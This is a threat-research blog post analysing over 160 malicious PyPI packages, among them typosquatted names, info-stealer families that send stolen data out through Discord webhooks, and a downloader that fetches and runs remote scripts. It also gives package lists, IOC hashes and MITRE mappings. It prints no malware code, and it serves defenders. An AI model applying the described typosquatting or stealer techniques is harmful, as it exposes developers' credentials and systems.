Threat Research

PYPI Malware: Over 45K Users Fell Victim To PYPI Packages – Cyble

Securonix

Misspelled Packages Preying on Unwary Victims

On May 20th, an incident report was released by PyPI administrators that announced the temporary suspension of new user and project name registrations. The reason behind this action is the overwhelming surge in malicious users and projects being created on the PyPI index in the past week.

In this notice, the PyPI administrators mentioned, “The volume of malicious users and malicious projects being created on the index in the past week has outpaced our ability to respond to it in a timely fashion, especially with multiple PyPI administrators on leave.

PyPI (Python Package Index) is an official third-party software repository for Python. It is a widely used repository for packages developed for the Python programming language. PyPI allows developers to easily access and download pre-built Python packages, saving them time and effort in building code from scratch.

Cyble Research and Intelligence Labs (CRIL) have been actively tracking malicious python packages and recently, we also reported an InfoStealer dubbed as KEKW that was spreading through multiple malicious python packages.

After the notification released by the PyPI, we investigated further into this incident. During our research activities, we came across over 160 malicious python packages. Based on the stats fetched from PePy, we found that these packages had total downloads of over 45,000. We also found that there was a Month-over-Month increase in downloads of malicious python packages. All these packages have been removed from PyPI and have prevented new infections.

The Figure below shows the distribution of the number of packages downloaded in the last three months.

Number of Unique Malicious Packages Downloaded in a Month
Figure 1 – Number of Unique Malicious Packages Downloaded in a Month

In this blog, we present our comprehensive analysis of more than 160 malicious Python packages. Our research covers various intriguing aspects, including:

  • Misspelled packages employed by adversaries.
  • The proliferation of new malware variants that propagate through malicious packages.
  • Adoption of a new obfuscation technique by the notorious W4SP Stealer.
  • Tactics employed by threat actors who have capitalized on the EvilPIP module.

Analysis

We came across the following malicious python packages.

colordiscord syssqlite3V2 pyfontslibv2 ovcdtwfcak py2colors
discordcolor syscolourtoolkit pipcoloringliberyV2 jfqyotpnvb  
diskolored syssqlite2toolsV2 pipcolorlibraryV1 mdkjrkjelz  
discolor2 pipcryptov4 pythoncolourlibraryV1 amazonfdndn  
discolorpy pythoncolouringslibV2 pyfores dscripting  
hubtik pysqlite3pkgV2 pyfontslibraryV1 ZHPT1CSCOE  
pywinrequest pyapicolorv2 pipcoloringlibary zyqnuutupjerllnbxaeq  
flaw pythoncryptlibery pipcolorlibV3 uihuihiuhiuhiu  
colorpack pipcryptaddsV2 pyfontslibrary testnetdubled  
TerminalGUI sysdatalib fores azerty123  
pythoncoloringv1 pylibsql pythoncolouringliberyV1 pydistoolhebs  
pipfontingv1 pysqlilibraryV1 pycryptolibary tristanelbg  
pythonfontingv2 syscryptlibV2 pyfontslib zefkopzekfo  
pycolorv3 syssqlite2package proxyscrapertool pipcolor  
pythonfontsv2 pipcolourpackagesV2 forring testlibtaha  
pycolorlib pylibfont pipcryptographylibraryV2 reaquests  
pipsqlimodV1 pythonsqlite2mod pythoncolouringslibV1 pycolorings  
pycolorlibaryV1 pythonsqlitetool initializers pycoloring  
pipcolouringv1 pipsqlpackageV2 totohateinenkleinencock habboapis  
pythoncryptolibrary pipfontingaddonsV2 pyforing color_animated  
pipcolorpkgV1 pythoncryptoaddition foring python2color  
pyfontingtoolsV1 pipcoloringsextV1 testdontdownloadthis ovcdtwfcak  
pycolouringlibrary syssqlitemods forings jfqyotpnvb  
colopym2 syscoloringspkg webhookie mdkjrkjelz  
pipcryptov2 syscryptographymodsV2 hookiweb amazonfdndn  
pipcryptomodsV2 pythoncolorlibV1 skilin3 dscripting  
syscoloringextensionV2 pythonsqlite2toolsV1 ingniodgniodguno ZHPT1CSCOE  
syscolouringsextV1 pythoncryptolibV2 cleanese zyqnuutupjerllnbxaeq  
syssqlitedbextension pycolourkits testiramtikurbu uihuihiuhiuhiu  
syssqlite3liberyV1 pythoncolourv8 gdfgdfgdfgdfg testnetdubled  
pythoncolouringaddsV2 pythoncolorv4 libcrypt azerty123  
pipcolortoolkit pythoncryptov4 pyreqs3 pydistoolhebs  
pyfontingpkgV1 pycoloringv9 colorfy tristanelbg  
pipcolorv2 pythoncryptv10 zeubilamouche zefkopzekfo  
pythoncolouringpkgsV1 pythoncryptov2 pyou pipcolor  
syssqlitelibery pycryptv7 tasksaio testlibtaha  
syscolouringkitsV2 pipcolorv6 taskaio reaquests  
pipcryptoaddonsV2 syscolorv2 libcolors pycolorings  
pipsqlite3extensionV2 pyforings colorlibs pycoloring  
pyfontinglib syssqlite3V2 pypackscate habboapis  

Misspelled Packages

CRIL’s investigation revealed that Threat Actors (TA)s have been uploading misspelled Python packages specifically targeting Python users. One notable example was discovering a malicious package named ‘reaquests’. This deceptive package intentionally mimics a legitimate and widely used Python package called “requests,” which serves as a popular tool for performing HTTP request operations among millions of users.

The uploading of misspelled packages poses a significant risk, particularly if multiple Threat Actors adopt this technique. Such a strategy can easily lead to the infection of numerous unsuspecting users. Python packages are typically installed using the command “pip install package_name”. In cases where users accidentally mistype the package name, they unknowingly install a malicious Python package, putting themselves at risk of malware infection.

  • reaquests-0.1-py3-none-any
  • Total Downloads: 252

The figure below shows the download statistics for the last 3 months.

Source PePy
Figure 2 – Source PePy

Upon analyzing the aforementioned malicious package, our investigation revealed that it was designed to infect victims with an InfoStealer. This particular type of malware targets users’ Google Chrome web browser and extracts their login credentials. The stolen information is then exfiltrated using Discord Webhook.

Stealer Code
Figure 3 – Stealer Code

Malware Variants

Downloader

During our investigation, we identified a series of packages mentioned below that employed an identical downloader. Notably, these packages collectively recorded a total of 1355 downloads.

  • pyou-0.0.1-py3-none-any
  • tasksaio-0.0.1-py3-none-any
  • taskaio-0.0.1-py3-none-any
  • libcolors-0.0.1-py3-none-any
  • colorlibs-0.0.1-py3-none-any
  • pipcolors-0.0.1-py3-none-any
  • pycolorings-0.0.1-py3-none-any

The downloader in question operates by retrieving a remote script from a designated URL and running it through the Python interpreter. To facilitate this process, a temporary file is employed to store and execute the remote script. In this case, the remote content was hosted at “https[:]//paste[.]fo/raw/” and was obfuscated using Hyperion, an open-source Python obfuscator renowned for its ability to apply multiple layers of obfuscation to scripts.

The figure below illustrates the downloader script’s mechanism for fetching the remote content.

Downloader's Script Mechanism
Figure 4 – Downloader

Creal Stealer

The Creal Stealer is an open-source stealer that has been extensively utilized by threat actors (TAs). Although CRIL identified instances of this stealer spreading through phishing sites, there was no evidence of it being propagated through Python packages. In our analysis, we discovered several Python packages that were found to distribute the Creal Stealer.

Below are a few examples of these packages, which have been downloaded over 1300 times.

  • amazonpxnau-0.0.1-py3-none-any.whl
  • discordcolor-0.0.1-py3-none-any.whl
  • discolorpy-0.0.1-py3-none-any.whl

The figure below shows the Creal Stealer.

Creal Stealer
Figure 5 – Creal Stealer

TIKCOCK GRABBER

The TIKCOCK GRABBER is a type of Information Stealer malware that focuses on extracting sensitive information from victims’ systems. It specifically targets the Google Chrome browser to steal login credentials and credit card details. To exfiltrate the stolen data, this malware utilizes a Discord Webhook.

The figure below shows the TIKCOCK GRABBER script.

TIKCOCK GRABBER Scriot
Figure 6 – TIKCOCK GRABBER

We found this grabber in the following package that was downloaded over 100 times:

•           hubtik-1.0-py3-none-any

The figure below shows the download stats for hubtik.

Figure 7 Source PePy
Figure 7 – Source PePy

Hazard Token Grabber

The Hazard Token Grabber is an Information Stealer malware that is available as an open-source project. Initially discovered in 2021, an improved version of this malware was observed by CRIL in 2022. Being openly accessible on GitHub, it has become a popular choice among Threat Actors who use it as a foundation for developing their own variants. While the Hazard Token Grabber is capable of extracting data from various applications, its primary focus appears to be on targeting Discord platform users, owing to its specialized functionality. CRIL has observed instances of this malware strain spreading through several Python packages, which were downloaded over 1000 times.

  • webhookie-0.1-py3-none-any
  • hookiweb-0.1-py3-none-any
  • skilin3-0.1-py3-none-any
  • ingniodgniodguno-0.1-py3-none-any
  • cleanese-0.1-py3-none-any

The figure below shows the Hazard Token Grabber script present in the python packages.

Hazard Token Grabber
Figure 8 – Hazard Token Grabber

Updated Obfuscation used in W4SP Stealer

We also found a malicious Python package that was delivering obfuscated python stealer.

In the past, the W4SP stealer has been known to spread through malicious Python packages. In our recent research, we discovered a new obfuscation technique employed by the W4SP stealer. The obfuscated code for the stealer is displayed in the figure below.

The following packages were downloaded over 300 times and were spreading W4SP stealer:

  • pypackscate-1.1.2-py3-none-any.whl
  • pypackscate-1.3.0-py3-none-any.whl
  • pypackscate-1.2.0-py3-none-any.whl
  • pypackscate-1.1.3-py3-none-any.whl
  • pypackscate-1.1.1-py3-none-any.whl
W4SP Stealer Script
Figure 9 – W4SP Stealer

EVILPIP

During our investigation, we encountered a package called “Sintaxiscodigo-0.0.0-py3-none-any” with a download count exceeding 300. Upon further analysis, we discovered that this package was responsible for propagating EvilPIP, an open-source malicious PyPI module. Upon delving deeper, we found that a module named EvilPIP had been uploaded to PyPI and had amassed over 4000 downloads. Unfortunately, since the module has been removed, we no longer have access to its “.whl” file. However, based on the module’s documentation, which indicates that the attacker needs to upload it to PyPI for installation on the victim’s system, we suspect that it was indeed uploaded with the intention of infecting users.

The figure below shows the EvilPIP module present in the Sintaxiscodigo package.

EVILPIP
Figure 10 – EVILPIP

The figure below shows the download stats of the EvilPIP module.

EVILPIP STATS
Figure 11 – EVILPIP STATS

Conclusion

Malicious Python packages present a significant risk to businesses as these packages can be disguised as legitimate software libraries or modules but contain hidden malicious code or backdoors. Once integrated into a business’s software ecosystem, it can have several detrimental effects.

Our analysis revealed that InfoStealers, a specific type of malware, was predominantly propagated through malicious Python packages. The presence of readily accessible code for information Stealers on platforms like GitHub has empowered multiple threat actors to leverage this particular strain of malware in their campaigns.

Additionally, we observed a new technique employed by these TAs to infect users by utilizing malicious Python packages. This technique involved employing deliberately misspelled package names, such that if a user made a typographical error while installing a package, they inadvertently risked infecting their system with malware.

Our Recommendations

  • Before using any Python package, review its source code and ensure it comes from a trusted and reputable source.
  • Use strong passwords and enforce multi-factor authentication wherever possible.
  • Turn on the automatic software update feature on your computer, mobile, and other connected devices.
  • Use a reputed anti-virus and internet security software package on your connected devices, including PC, laptop, and mobile.
  • Refrain from opening untrusted links and Email attachments without first verifying their authenticity.
  • Educate employees on protecting themselves from threats like phishing/untrusted URLs.
  • Block URLs that could be used to spread malware, e.g., Torrent/Warez.
  • Monitor the beacon on the network level to block data exfiltration by malware or TAs.
  • Enable Data Loss Prevention (DLP) Solutions on the employees’ systems.

MITRE ATT&CK® Techniques

Tactic  Technique ID  Technique Name 
Initial Access T1195 Supply Chain Compromise
Execution   T1204  
T1047 		 User Execution 
Windows Management Instrumentation 
Persistence  T1547  Registry Run Keys / Startup Folder 
Defense Evasion  T1497 
T1562 
T1027		 Virtualization/Sandbox Evasion 
Disable or Modify Tools 
Obfuscated Files or Information
Credential Access  T1056  Credential API Hooking 
Discovery     T1057 
T1012 
T1082 
T1083 		 Process Discovery 
Query Registry 
System Information Discovery 
File and Directory Discovery 
Collection  T1005  Data from Local System 
Command and  
Control    		 T1071  Application Layer Protocol   

Indicators of Compromise (IOCs) 

Indicators  Indicator Type  Description 
976aea7821badd4dd8133278ed4ee218
61f663719274a031ee40f02d604fd9960060ea07 efdd674a7ee3f8ddb4e0660e594a7c1f8cb54d5498cce03e8c3eaa2b105126d2		 MD5 
SHA1  SHA256 		 reaquests-0.1-py3-none-any.whl
4f8346f2d9502e249724100d112ea4a5
b875ebf1ec7ac3973230e605ebceea4926d623cb eef7c5cf85d05b5ace7545d946b811b8537537c8b37261ff13f3b3d6ad2aea68		 MD5 
SHA1  SHA256 		 pyou-0.0.1-py3-none-any.whl
31d3a754d6a08751c95faef4c104bfb9
013059c0e67809852e58b003e53afa73d0a92e42 7805d4b9ffe77438bb64d598fe7badd30668f86c15d50036a5d3cae54840eb41		 MD5 
SHA1  SHA256 		   tasksaio-0.0.1-py3-none-any.whl
93d8534a56850948adbc5e7bce87b0af
ffab6e414e0bf6961b248a4c28d49461253bc4ab 59bb18441b04c350c4cc8614e4c324fc2206c53eb7e1a89cd9a709054b0aa009		 MD5 
SHA1  SHA256 		   pycolorings-0.0.1-py3-none-any.whl
a1bfd3b08421ddf9aa9c91c9b6a34e7b
2290c7ac209451ad504cba0435247060dc1c9b8a 6b75377714c9dacc3f11e2655a661ab4eaba89cb3f6ecd9eac5b2b0224a58b0e		 MD5 
SHA1  SHA256 		 pipcolors-0.0.1-py3-none-any.whl
47179602a616d00ae60c636c695f735c
bd234dd0310fc6dea7f199617ecf5d8b80219563 314d9f07bf2c0072513e0ad572e78364d49067dfc3afbcae3140a67a0174a525		 MD5 
SHA1  SHA256 		   taskaio-0.0.1-py3-none-any.whl
565435a872c8947b5b1cc993f9045ec3
2eac1e6ef0a095f3850c64639538c7c1ee9ccfa9 ad82fda01eeebb112d5232f3ad1306230dd50b20cccc07c139b06fe2a6467bd1		 MD5 
SHA1  SHA256 		   libcolors-0.0.1-py3-none-any.whl
1d9bfd5868a4ca40dd843561ce4193a0
3e15a695b8d80e05acd69954cc95b856819a0a9a 0311ae10991227539a4231be8121367f7e92ec5c1e55b7dd14797cdc0d97c255		 MD5 
SHA1  SHA256 		   colorlibs-0.0.1-py3-none-any.whl
fe3445c6a171c65dea77d84e3626904f
1576d02dbcbd900ee2e9bb99b03c1ee7f0863e35 3e326eb99d69a5a176f8888f7004f609d49572fd74a4af33148b901c90ad3594		 MD5 
SHA1  SHA256 		   discolorpy-0.0.1-py3-none-any.whl
0819ac8bb225e7629b1bb1d93a15a71e
5aaf75d34f25a74d888adc6f5b85d5e6bfa1867c 0791dea25193241a2347accfc2905fd3d17bb21517c9eaa8ceaca195e6f6d50b		 MD5 
SHA1  SHA256 		   amazonpxnau-0.0.1-py3-none-any.whl
5a0956e906c8c181c27aa17c6123fbb9
226f382d9cd6b76aa5e38292b73a67f1b896fec2 a1ebc31e4a2b2d4aba42d79d5b7b90f407e9edc93a4dcc80dd2ed114b14dd044		 MD5 
SHA1  SHA256 		   discordcolor-0.0.1-py3-none-any.whl
436f4c650b7302be3032f5ce6ca7a24f
9e801aece01df6d80b0f6bae0bbbec23d017c03d 0fa123cde893d2a349c0f42201da6f43fd69f4dd5d0ec56582b279b2119004fa		 MD5 
SHA1  SHA256 		 hubtik-1.0-py3-none-any.whl
0fbff92a308d1bdea4a26f62476669ee
fd0597b855bffb35d1a3f65300a843b00c4844ed 670a653219ebe12dd9fb965108d9793f34abbc52a79cceb3b7a83343bf072b27		 MD5 
SHA1  SHA256 		   webhookie-0.1-py3-none-any.whl
a847312f0f895e02ed9c77e873b1ded5
f35592c5822471ef8436b662faa2c44e0f497477 6ced10ff80a510a638623a1705e35885053502b8800fa6c403451200387d39dc		 MD5 
SHA1  SHA256 		   cleanese-0.1-py3-none-any.whl
805104e6677caf58d36d90ab7ce2ae87
a5477470fa622099b7e0ed1750e745573879c9cf 5b097d5d376b1c4b144f98b67eff214982c7052ceb49b041e616e691c25819a7		 MD5 
SHA1  SHA256 		   ingniodgniodguno-0.1-py3-none-any.whl

Other IOCs

Indicators  Indicator Type  Description 
0e79c93af6d83bf646b83fec1caa05a6
a235b1cbf6d5666db00c592e8934997b
63e05b3699ce91ebe201172025b12094
c0024b98d14e50e56a14c10aaf379bed
029f364fe66c8984c7e8700eec5617ff
401932b9238be50a86688bd19433de69
22ce0b12a84bb2afd923dc0381923eeb
176b6a52523322eb4d619dc6429217b0
d90a77c470a13680e8cd49bbfafbbb4e
1bfa618ca9711feb0b0a2299ae6d24e0
270f0081fe6e22d7bb169ebcf6cc22e4
8954e5f8e7b327d1f558b99781b1655c
361cadc3fe035433dbcdfbd7c28e1d2e
753023c47e2b278f9978a690a27647fd
aca0faf71292c459eb1e134b586fa880
708d15f342a07488b3e819517cc895e4
b94693cef2beeca425fa3f7c2eb2a123
7c615803ac3911250bcc9ed323a0c7b8
fa57d689a3717c81cc0cd81daf422758
e3cd857ae6aee044ed7aba89d6383b4a
d0a4a9a9cb1f2344917e8f20af74d472
493a72c3a37f9e3c2b656083c2360bd7
961a51686dcbf22765d1e6b906cc1af1
5c2cb73b848bef94b1ce35d2fe9ca147
3e5cacca2762a3aa7520da5cbfdfbf1f
0dc69553aecb4ffa65278cc61f46510d
38581367aff9a84da949c2642dcaf2da
e9c6aeffd1b8a42124f443c20c70b777
03840a7dae65417bf8d1def4ca1cff9e
4b5f4d46f2c14d8fcfaec099ca1a919c
ca91a830bc9dacd34d6e5628112c88d3
235c7b33f60a0680d4c16ac0f8326a99
589719269bce76467d8163ff01e1002e
7a232c4b529100e05e16004b601bb9a9
8480765e1b4a9fe56f9d72ab27e9a8a3
b322097b7f209180b697ef9291d25fac
cb99114957657c81e483421058893c48
a439c4008c1a89341592278779db9617
2c5de3087bb13314c9e94d3d0efb2de0
cb7c4e1944f852862ec30c2a593582a2
3f750a3f618bddd697987b4773297fbd
e84408efb2d1bf3602163c2670de695d
0e2861958488e067d3da724d9baaa42a
a09e78a04a89e5756c5e5f327758a95e
7cba37fe4a82bd727d16140cb00192cb
d211815d0507aa070b99d5a6c9e3c300
cd674b4f5df5c2714205f25097621fae
42d12fedc579bbf69b6b150bb05c466f
d2b0d9bfd1b01f5dfc4cb7f89ffab1ad
e1c8f589963cb0eff93027a7fcfb4b73
55145b977e2aade4dd6a1e7f9966266f
76e08229aae953002dce4fe06454e158
1629406cbb606fdc4b6a83849f05d12c
7eb67f0591d6ade5ad399dca770a0a6b
258df1f7a44e343f41a1167e919a3821
001beecd74578178013fec56d10724df
1e5a4f71632ed0eac001551c6453e2e0
1ba4b9a81a9df9a457e8565e63785b85
1cc87ac9d9066a9829e4245fd86d4cfc
e9e052a0448f8da19f75bb1360978505
fd4bd57d2e4e819ce372d5c5d7bba38a
38af78324644015f6f607722c128b5d8
16c67a78cb0f52a8f8fc3091db86b32d
a325f3786acb7806a132684fdfe2112b
f13c2c898f2ed318897bca865a9c8069
7fa034ccc098809acabfff2fcd4e96ef
34ae6047f400a96f5b41687d7343c8a3
8363ac8191ca5fd1e1cd7c96fa2cc45e
635ce6b6152909ce4ac6429fb2f3ad32
ec9b0dfeba30306a6116b897af32ae7a
ffbbabfba5ffcfc649f6216413ad8909
0eb21d12263de4c67b078ccab965864d
4a7b3d08a9f3a0202d99d1b3a9f81fd5
b2d71b8c64620d47c6eb5081de1e8d62
a2f39ac2237af77cdafe0d6968509ff5
efa21f5366eabe63ba0b62984790b0d4
795363e6bb52e2019187ebe3ab255a4d
b9dca9e46a90faadd9965131e7a2efe4
caf56f8dedbcecbc83ff4d340bc7bda9
28262b34b339e51c63ecef9b52f35e8c
c5d902020c64da9a60aad3221a75cf87
ee8570df0cba92ad0e49905fd95e2e71
343c7651a29a3ac454a12289cf0d6e7b
c745396571b3670fde28dcc0c315bb37
d1b7e5a64b0bd98a27f5a4042c988a88
575b12898aeef7f1d560094848bc3ce4
5c3ee630e09b867eea708d9c5be095fd
f2ee9f14eeb8b5746cfa3cc2ed588974
ab445242060e7d4e6a156e3c840ca9d6
d08dfe27c04d13d449136c3a06de8107
7bd4ef8f62ec4159722d0ec8adb70349
cfd0ab2765605983d71a792a4660d574
a9977761ae28d5e3dfe9e0de0617436a
ae4843e4765479d6932287a41e95344d
e6c587bfd3ceee736ad141917b2c7cac
5879625768994dfaf8b93b78bbe18afb
55090883be187351291a06138c06afbd
9d8ba9c0068d28b3e02b9a439b6edc58
abb598d6ea2199d646cfc9923d93a15f
0ed700709095806c69423bb996faefb3
3a12dde2f42dbf7afea47ffaf3dd3109
d27f533c6e9c43ad42fe31a21e978bf6
c823fa8f8c6514a851cd3ac30409ba33
c8eddac4d79f92803e359a4e61b0231d
ce42c73c08bddb982788ac1bc63c3a61
ef8c3352d0121661bcca4499f6aed710
607b4e213f441b6a0d32de8e0877d889
adb7e0f589c669c3847839e4d1f1e436
fd2994428ff4e59ea4cdc02a0686cbfa
f9f2d2629aa9fd6c3cad8f2044ead1b1
cab39ae5aadd57167b0fcb1a79c1ea09
7fc0325bb787a4e83763569bd45aa2ba
240f7c2bbc1341210abaf02f6c689e80
283013b1a072b495d31245cd28a88b74
0ef09386f414323876a897e17a2dfe23
e694fee47eee048409e4ee6b36af029a
ec159c68f615e5cf219e1f52f3e8b3a0
9bb6e08d5eb32f9958791903ec15088a
e4fdea1d6e79ec3bd761a32f91fc11c6
d8b5c9b42ff3fc91147df65d81bea9c0
2fae0243ffac9ed194d36f0913dfce63
86bf1d5b68b9c2bd01f52d36d925cddc
eed25312677a37e3fc4f96b9c87a3c8d
d1d64f23a842bbbb12940f0268c3f0ed
8b3b60524d603f44dba007c3eebf164e
8e3ecfc2d45d3ebc65b7d9db2d88a5fd
c3e10f3791558d5a1ae74e4237c400c0
f824f4190dfe9c901eac1d7d5fd9d91a
a0b4e5552bde607c0c0abca74d34411d
09311fe698c6bbca1299599f47abe35c
f1532fcf2c067463f0eb730276c73e92
77da90ca08d7e3d2247e69d45071aa94
4d0d6fa35b58b44ddd317934af61f1d8
2f1474e617cb674ad1ddee59fdabe636
619dbe6b8d1e46dbdee32f915e82630d
448c6fa32aa2b8703f7c546a8e3e7178
e82fdc0ee8f4b68f14f1d4eaff0b99a3
7c9c5d61f0a301f062735ec81215a6e9
4c6adafabe47e565dd5958ed064d490b
e59e9340a3f5894d8e54d8c218b40c4f
11d09eab562acace5ece59e9f466908b
4369b69d2a28fbb1055866487ab71512
3ae10f64aa901d00ce9d7e04b7a4f6e7
d8a7ce15b0ab1c832f1eedf7e33d57ec
71d87ac0bbb30aaea3d02083f440c389
d5d237ebb48a2320c07b6d1e635807af		 MD5  Malicious Python Packages

Disclaimer: The samples (.whl files) utilized for the purpose of this report were obtained from VirusTotal. The download statistics mentioned in this report were collected from PePy.

Source: https://blog.cyble.com/2023/06/09/over-45-thousand-users-fell-victim-to-malicious-pypi-packages/

Tags: EXFILTRATION, DLP, DISCOVERY, BROWSER, MOBILE, MONITOR, EMAIL, PHISHING